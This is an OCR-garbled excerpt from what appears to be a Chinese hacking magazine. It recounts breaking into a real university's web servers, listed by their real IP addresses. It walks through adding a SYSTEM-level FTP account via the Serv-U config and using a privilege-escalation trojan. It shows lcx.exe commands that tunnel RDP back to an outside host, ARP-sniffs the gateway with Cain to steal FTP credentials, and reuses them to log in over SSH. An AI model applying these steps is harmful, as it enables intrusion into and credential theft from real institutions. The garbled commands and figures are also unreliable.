如发现有乱码，请点击下面链接浏览原文
正文摘录:

如何修改就不废话了，有兴趣的话大家可以去了解一下Serv—U配置文件的存放规则，了解之后再修改起来就得心应手的了。我添加了一个用户名为hackest，拥有system权限的FTP用户。要是配置文件没有权限修改的话，可以使用SU提权木马执行cacls·exe修改文件属性为everyone完全控制就可以修改了，不过cacls.exe需要系统文件格式为NTFS才可以使用。在CMD下登录FTP上去，执行c：＼Documents。“dSettings＼AllUsers＼Documents＼Icx.exe—slave219·129.213.25251127。0.0.13389，然后在本机上执行Icx.exe—listen512007，然后再连接本机的2007端口就可以登录远程服务器了，如图13。到此我已经成功控制了61.129.42.42这台服务器。接下来就是安装cain进行嗅探了，关于cain的使用，大家可以参考I暨I13在61.129.42.42上执行“ipconfig／all”命令得知默认网关为61.129.42.1，如图14。复旦大学主站的IP为61.129.42.5。设置好cain就可以开始嗅探攻击了。由于刚开始的那几天是五一假期，嗅了两天也一无所获，N天后终于有进展了，wyzhack告诉我说已经成功嗅探到了复旦大学主站的FTP用户名和密码了，如图l5。有了FTP密码就等于有了一切，利用FTP图14五、尘埃落定现在就已经完全控制了复旦大学的主站了，虽然主站的操作系统是Linux，但是我们通过先入侵一台Windows的3389肉鸡再进行对目标的嗅探就达到了预期的效果，可见嗅探的威力的确非比寻常，不注意防范的话可是非常危险的!既然是Linux系统，管理员一般都是使用SsH来远程管理服务器的。扫描一下主站的服务器，发现开了22端121(SSH的默认连接端口为22)，尝试使用嗅探到的FTP用户名和密码登录SSH居然成功了，如图17(小编注：在Windows下不能直接登录SSH，大家可以使用putty这个小工具)。至于通过溢出或者其它提权方法来得到rOOt权限，我就不弄了，因为这方面实在不太熟悉。本文主要是介绍一种入侵思路，有了可行的思路，方法上就好实现了，入(文章中涉及到的SUpSPsCa~5.0、明小子旁注入侵工具、ICX.8Xe、cain、putty，已经收录于光盘中)墨图…M刚KK